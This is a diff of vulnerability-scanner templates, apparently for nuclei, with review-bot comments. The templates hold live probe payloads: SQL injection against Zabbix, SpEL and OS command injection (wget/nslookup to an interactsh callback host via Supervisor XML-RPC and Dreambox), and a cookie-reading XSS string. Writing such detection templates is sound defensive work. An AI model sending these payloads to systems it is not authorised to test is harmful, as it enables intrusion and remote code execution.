- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2015-7450
tags: cve,cve2015,websphere,deserialization,rce,oast
tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80

View File

@ -8,7 +8,7 @@ info:
reference:
- https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2015-8813
tags: cve,cve2015,ssrf,oast
tags: cve,cve2015,ssrf,oast,umbraco
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
cvss-score: 8.20
@ -24,4 +24,4 @@ requests:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- "http"

View File

@ -5,7 +5,7 @@ info:
author: daffainfo
severity: medium
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658
tags: cve,cve2016,wordpress,xss,wp-plugin
tags: cve,cve2016,wordpress,xss,wp-plugin,maps
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10

View File

@ -5,7 +5,7 @@ info:
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
tags: cve,cve2016,wordpress,xss,wp-plugin
tags: cve,cve2016,wordpress,xss,wp-plugin,mail
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10

View File

@ -0,0 +1,34 @@
id: CVE-2016-10134
info:
name: SQL injection vulnerability in zabbix "latest.php"
author: princechaddha
severity: critical
description: SQL injection vulnerability in Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php.
reference:
- https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
- https://nvd.nist.gov/vuln/detail/CVE-2016-10134
tags: cve,cve2016,zabbix,sqli
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2016-10134
cwe-id: CWE-89
requests:
- method: GET
path:
- "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Error in query [INSERT INTO profiles (profileid, userid'
- 'You have an error in your SQL syntax'
condition: and
- type: status
status:
- 200
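Review bot: both body words are MySQL-specific (`You have an error in your SQL syntax` is MySQL's message, and the `INSERT INTO profiles` fragment is the write Zabbix attempts), so with `condition: and` a Zabbix instance on PostgreSQL will not match even when vulnerable; record the MySQL dependency in `description:`. Adding `injection`, as the lighttpd SQLi template in this commit does, would keep the tags consistent.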

View File

@ -8,7 +8,7 @@ info:
reference:
- https://cxsecurity.com/issue/WLB-2016080220
- https://wpvulndb.com/vulnerabilities/8609
tags: cve,cve2016,wordpress,wp-plugin,lfi
tags: cve,cve2016,wordpress,wp-plugin,lfi,mail
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50

View File

@ -22,7 +22,7 @@ network:
host:
- "{{Hostname}}"
- "{{Hostname}}:5555"
- "{{Host}}:5555"
matchers:
- type: word

View File

@ -5,7 +5,7 @@ info:
author: melbadry9,nadino,xElkomy,sullo
severity: low
description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
tags: crlf,generic,cves,cve2016
tags: crlf,generic,cves,cve2016,apache
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
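Review bot: the tag line uses `cves` where every other template in this commit uses `cve`; fix it while touching the line so a `-tags cve` filter picks this template up.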

View File

@ -0,0 +1,32 @@
id: CVE-2016-4977
info:
name: Spring Security OAuth2 Remote Command Execution
author: princechaddha
severity: high
description: When processing authorization requests using the whitelabel views in Spring Security OAuth 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote code execution via the crafting of the value for response_type.
reference:
- https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2016-4977
tags: cve,cve2016,spring,oauth2,oauth,rce,ssti
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2016-4977
cwe-id: CWE-19
requests:
- method: GET
path:
- "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Unsupported response types: [978015547]"
- type: status
status:
- 400
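Review bot: `cwe-id: CWE-19` is a category ("Data Processing Errors"), not a weakness; SpEL evaluation of `response_type` is CWE-917 (Expression Language Injection). The arithmetic probe is sound: `13337*73331` is 978015547, which is what the matcher expects inside `Unsupported response types: [...]`, and the 400 status check is consistent with that error path.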

View File

@ -19,8 +19,8 @@ info:
network:
- host:
- "{{Host}}:22"
- "{{Hostname}}"
- "{{Host}}:22"
matchers:
- type: regex

View File

@ -6,7 +6,7 @@ info:
severity: critical
description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
tags: cve,cve2016,lfi
tags: cve,cve2016,lfi,auth,bypass
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
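Review bot: `description:` says the traversal lets an attacker delete arbitrary files as root, yet the tag line says `lfi` (a read); if the template exercises the delete path it is destructive and should say so, and if it only probes reachability the tags should reflect that. Adding `auth,bypass` is fine either way.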

View File

@ -13,7 +13,7 @@ info:
cvss-score: 7.50
cve-id: CVE-2017-0929
cwe-id: CWE-918
tags: cve,cve2017,oast,ssrf,dnn
tags: cve,cve2017,oast,ssrf,dnn,dotnetnuke
requests:
- method: GET
@ -29,4 +29,4 @@ requests:
- type: status
status:
- 500
- 500

View File

@ -6,7 +6,7 @@ info:
severity: high
reference: https://www.exploit-db.com/exploits/49693
description: jqueryFileTree 2.1.5 and older Directory Traversal
tags: cve,cve2017,wordpress,wp-plugin,lfi
tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
@ -28,4 +28,4 @@ requests:
part: body
- type: status
status:
- 200
- 200

View File

@ -10,7 +10,7 @@ info:
- https://github.com/pimps/CVE-2017-1000486
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
tags: cve,cve2017,primetek,rce
tags: cve,cve2017,primetek,rce,injection
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
@ -32,4 +32,4 @@ requests:
- type: word
words:
- 'Mogwailabs: CHECKCHECK'
part: header
part: header

View File

@ -10,7 +10,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2017-11610
metadata:
shodan-query: 'http.title:"Supervisor Status"'
tags: cve,cve2017,rce,supervisor,oast
tags: cve,cve2017,rce,supervisor,oast,xmlrpc
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
@ -30,13 +30,26 @@ requests:
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>wget http://{{interactsh-url}}</string>
<string>nslookup {{interactsh-url}}</string>
</param>
</params>
</methodCall>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
- type: word
part: header
words:
- "text/xml"
- type: word
part: body
words:
- "<methodResponse>"
- "<int>"
condition: and
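Review bot: switching the OAST probe from `wget http://...` to `nslookup` and the expected protocol from `http` to `dns` is reasonable, but the new body matcher is weak on its own: an XML-RPC fault response also contains `<methodResponse>` and `<int>` (the faultCode), so `<methodResponse>` + `<int>` under `condition: and` does not separate success from a fault. The interactsh `dns` match is what carries the signal, and since `matchers-condition: and` requires all three, a target without outbound DNS will report as clean.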

View File

@ -6,7 +6,7 @@ info:
severity: critical
description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.
reference: https://github.com/assalielmehdi/CVE-2017-12635
tags: cve,cve2017,couchdb
tags: cve,cve2017,couchdb,apache
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80

View File

@ -5,7 +5,7 @@ info:
author: apt-mirror
severity: high
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
tags: cve,cve2017,sap,lfi
tags: cve,cve2017,sap,lfi,java,traversal
reference:
- https://www.cvedetails.com/cve/CVE-2017-12637/
- https://nvd.nist.gov/vuln/detail/CVE-2017-12637

View File

@ -0,0 +1,43 @@
id: CVE-2017-14135
info:
name: Dreambox 2.0.0 RCE
author: alph4byt3
severity: critical
description: enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py in the webadmin plugin for opendreambox 2.0.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI
reference:
- https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
- https://www.exploit-db.com/exploits/42293
- https://nvd.nist.gov/vuln/detail/CVE-2017-14135
tags: cve,cve2017,dreambox,rce
metadata:
shodan-query: title:"Dreambox WebControl"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2017-14135
cwe-id: CWE-78
requests:
- raw:
- |
GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "/bin/sh"
- "/usr/script"
condition: and
- type: word
part: interactsh_protocol
words:
- "dns"
- type: status
status:
- 200
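Review bot: this template relies on an out-of-band callback (`{{interactsh-url}}` in the request, `part: interactsh_protocol` in the matchers) but lacks the `oast` tag that the other callback-based templates in this commit carry (CVE-2017-11610 and CVE-2018-14839); add `oast` so users can include or exclude it depending on whether an interactsh server is available. Note also that `matchers-condition: and` requires the body strings `/bin/sh` and `/usr/script`, the DNS interaction and a 200 status all at once; that is a deliberately strict, low false-positive choice, but it will miss hosts whose page output differs, so it is worth stating that intent in a comment. The description should end with a period for consistency with the other templates.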

View File

@ -7,7 +7,7 @@ info:
reference:
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913
tags: cve,cve2017,trixbox,rce
tags: cve,cve2017,trixbox,rce,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80

View File

@ -0,0 +1,28 @@
id: CVE-2017-15287
info:
name: Dreambox WebControl Reflected XSS
author: pikpikcu
severity: medium
tags: cve,cve2017,xss,dreambox
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2017-15287
cwe-id: CWE-79
description: "There is XSS in the BouquetEditor WebPlugin for Dream Multimedia Dreambox devices, as demonstrated by the \"Name des Bouquets\" field, or the file parameter to the /file URI."
reference:
- https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
- https://www.exploit-db.com/exploits/42986/
requests:
- raw:
- |
GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
words:
- 'Unknown command: <script>alert(document.cookie)</script>'
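Review bot: the request does not match the description: the description names the BouquetEditor plugin, the "Name des Bouquets" field and the `file` parameter of the `/file` URI, while the request sends the payload in `command` to `/webadmin/pkg`; either the description or the request path should be corrected so the template documents what it actually tests. The `Content-Type: application/x-www-form-urlencoded` header on a body-less GET is unnecessary, and adding a `part: header` matcher for `text/html` under `matchers-condition: and` (as the supervisor template in this commit does with `text/xml`) would avoid flagging reflections in non-HTML responses.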

View File

@ -6,7 +6,7 @@ info:
severity: high
description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information.
reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
tags: cve,cve2017,nextjs,lfi
tags: cve,cve2017,nextjs,lfi,traversal
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50

View File

@ -9,7 +9,7 @@ info:
- https://github.com/ivanitlearning/CVE-2017-17562
- https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
severity: high
tags: cve,cve2017,rce,embedthis,goahead,fuzz
tags: cve,cve2017,rce,goahead,fuzz
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.10
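Review bot: this hunk removes the `embedthis` vendor tag while the rest of the commit adds vendor tags (`netgear`, `hikvision`, `fortinet`, `apache`); keep `embedthis` alongside `goahead` so the template stays discoverable by vendor.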

View File

@ -22,8 +22,11 @@ network:
read: 1024
- data: "show priv"
read: 1024
host:
- "{{Hostname}}:23"
- "{{Hostname}}"
- "{{Host}}:23"
read-size: 1024
matchers:
- type: word
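Review bot: the `host` list now contains both `{{Hostname}}` (which carries whatever port the input supplied, or none) and `{{Host}}:23`; confirm how a bare-hostname input is handled by the first entry, since it would then produce an address without a port. The new `read-size: 1024` also overlaps with the per-step `read: 1024` values above it; document which one governs the response reads or drop the redundant one. The same pattern is applied to the OpenSSH template in this diff, so whatever is decided should be applied to both.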

View File

@ -7,7 +7,7 @@ info:
reference:
- https://www.cvedetails.com/cve/CVE-2017-5521/
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
tags: cve,cve2017,auth-bypass
tags: cve,cve2017,auth-bypass,netgear
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.10

View File

@ -8,7 +8,7 @@ info:
reference:
- https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html
- https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
tags: cve,cve2017,rce
tags: cve,cve2017,rce,windows
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80

View File

@ -7,7 +7,7 @@ info:
reference:
- http://www.hikvision.com/us/about_10805.html
- https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01
tags: cve,cve2017,auth-bypass
tags: cve,cve2017,auth-bypass,hikvision
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00

View File

@ -5,7 +5,7 @@ info:
author: milo2012
severity: high
description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE)
tags: cve,cve2017,dotnetnuke,bypass
tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization
reference: https://github.com/murataydemir/CVE-2017-9822
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
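Review bot: the `description` context line reads "are affected to deserialization vulnerability that leads to"; since the hunk touches this template's metadata anyway, fix the grammar to "are affected by a deserialization vulnerability that leads to" and end the sentence with a period. The added `rce` and `deserialization` tags are appropriate given that description.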
@ -33,4 +33,4 @@ requests:
- type: status
status:
- 404
- 404

View File

@ -4,7 +4,7 @@ info:
name: Cisco ASA path traversal vulnerability
author: organiccrap
severity: high
tags: cve,cve2018,cisco,lfi
tags: cve,cve2018,cisco,lfi,traversal
reference: https://github.com/yassineaboukir/CVE-2018-0296
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

View File

@ -5,7 +5,7 @@ info:
author: milo2012
severity: high
description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.
tags: cve,cve2018,jolokia,rce
tags: cve,cve2018,jolokia,rce,jndi,proxy
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.10

View File

@ -5,7 +5,7 @@ info:
author: dhiyaneshDK,pikpikcu
severity: critical
reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
tags: cve,cve2018,jenkin,rce
tags: cve,cve2018,jenkin,rce,jenkins
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
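Review bot: the tag list now contains both `jenkin` and `jenkins`; `jenkin` looks like a typo of `jenkins`, so replace it rather than adding the correct spelling beside it, otherwise the misspelled tag keeps propagating into searches and the template statistics.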

View File

@ -32,4 +32,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
tags: cve,cve2018,lg-nas,rce,oast
tags: cve,cve2018,lg-nas,rce,oast,injection
requests:
- raw:

View File

@ -6,7 +6,7 @@ info:
severity: high
description: The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.
reference: https://github.com/immunIT/CVE-2018-11759
tags: cve,cve2018,apache,tomcat
tags: cve,cve2018,apache,tomcat,status
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
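Review bot: the added `status` tag does not name a technology, vendor or vulnerability class the way the other tags added in this commit do (`traversal`, `injection`, `deserialization`), so it is unclear what users would filter on with it; if it refers to a Tomcat status or manager endpoint exposed through mod_jk, use a tag that says so, otherwise drop it.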

View File

@ -6,7 +6,7 @@ info:
description: Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input.
reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E
severity: medium
tags: tomcat,redirect,cve,cve2018
tags: tomcat,redirect,cve,cve2018,apache
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.30

View File

@ -5,7 +5,7 @@ info:
author: hetroublemakr
severity: medium
reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
tags: cve,cve2018,spring,lfi
tags: cve,cve2018,spring,lfi,traversal
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.90

View File

@ -12,7 +12,7 @@ info:
specially crafted request parameters against Spring Data REST backed HTTP resources
or using Spring Datas projection-based request payload binding hat can lead to a remote code execution attack.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
tags: cve,cve2018,vmware,rce
tags: cve,cve2018,vmware,rce,spring
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
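Review bot: the description context lines contain two typos that should be fixed while this file is being touched: "Spring Datas projection-based" should be "Spring Data's projection-based" and "hat can lead" should be "that can lead". The added `spring` tag is correct: the affected product is Spring Data, so tagging only `vmware` would hide it from Spring-focused searches.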

View File

@ -9,7 +9,7 @@ info:
- https://github.com/unh3x/just4cve/issues/10
- http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-12998
tags: cve,cve2018,zoho,xss
tags: cve,cve2018,zoho,xss,manageengine
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10

View File

@ -6,7 +6,7 @@ info:
severity: medium
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
tags: cve,cve2018,fortios,xss
tags: cve,cve2018,fortios,xss,fortinet
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10

View File

@ -12,7 +12,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-15138
cwe-id: CWE-22
tags: cve,cve2018,ericsson,lfi
tags: cve,cve2018,ericsson,lfi,traversal
requests:
- method: GET

View File

@ -6,17 +6,17 @@ info:
severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
tags: network,openssh,cve,cve2018
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2018-15473
cwe-id: CWE-362
tags: network,openssh,cve,cve2018
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
- "{{Host}}:22"
matchers:
- type: regex
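Review bot: moving `tags` below `classification` diverges from the `info` ordering used by every other template in this commit, where `tags` precedes `classification` (compare CVE-2018-15138 in the same diff); keep the original position to avoid churn and keep the files uniform. The `host` change to `{{Hostname}}` plus `{{Host}}:22` mirrors the telnet template edited in this diff and raises the same question about bare-hostname inputs producing an address without a port.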

View File

@ -6,7 +6,7 @@ info:
severity: high
description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
reference: https://www.exploit-db.com/exploits/45439
tags: wordpress,cve2018,cve,lfi
tags: wordpress,cve2018,cve,lfi,plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50

View File

@ -5,7 +5,7 @@ info:
author: madrobot
severity: high
description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI
tags: cve,cve2018,nuxeo,ssti,rce
tags: cve,cve2018,nuxeo,ssti,rce,bypass
requests:
- method: GET
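Review bot: the description context line "Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI" should read "using an SSTI" and end with a period; the added `bypass` tag matches the description, which already names an authentication bypass.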
@ -15,4 +15,4 @@ requests:
- type: word
words:
- "31333333337"
part: body
part: body

Some files were not shown because too many files have changed in this diff.